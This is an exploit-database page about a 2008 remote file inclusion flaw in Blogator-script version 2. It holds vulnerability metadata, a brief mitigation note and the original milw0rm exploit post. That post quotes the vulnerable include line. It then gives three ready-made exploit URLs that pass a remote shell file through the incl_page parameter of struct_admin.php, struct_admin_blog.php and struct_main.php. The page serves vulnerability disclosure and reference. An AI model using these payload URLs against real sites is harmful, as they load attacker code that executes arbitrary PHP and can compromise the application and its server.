header-logo
Suggest Exploit
vendor:
Blogator-script
by:
jiko
8.8
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Blogator-script
Affected Version From: 2
Affected Version To: 2
Patch Exists: YES
Related CWE: N/A
CPE: a:blogator-script:blogator-script
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Blogator-script Remote File Inclusion Vulnerability

Blogator-script is prone to a remote file-inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the vulnerable application. Successful exploits can allow attackers to compromise the application and the underlying system; other attacks are also possible.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. Sanitize user-supplied input to prevent the inclusion of malicious files.
Source

Exploit-DB raw data:

-------------------------------------------------------------------------
  --          JIKI Team [ JIKO + KIl1er ]        ---
-------------------------------------------------------------------------
# Author  : jiko
# email  : jalikom@hotmail.com
# Home   : www.no-back.org
# Script  : Blogator-script  Version 2
# Bug   : Remote File Inclusion
# Download  : http://www.blogator-script.com/telecharger.php
# file  : struct_admin.php & struct_admin_blog.php  & struct_main.php
# Eror  :
   <? include($incl_page); ?>
=========================JIkI Team===================
# Exploit  :
 
  http://localhost/[script]/_blogadata/include/struct_admin.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_admin_blog.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_main.php?incl_page=http://localhost/shell.txt?
=========================JIKI Team===================
 greetz : all my friend and H-T Team 
-------------------------------------------------------------------------
  --            JIKI Team [ JIKO + KIl1er ]    --
-------------------------------------------------------------------------

# milw0rm.com [2008-04-04]

Navigation

Suggest Exploit

Services By CQR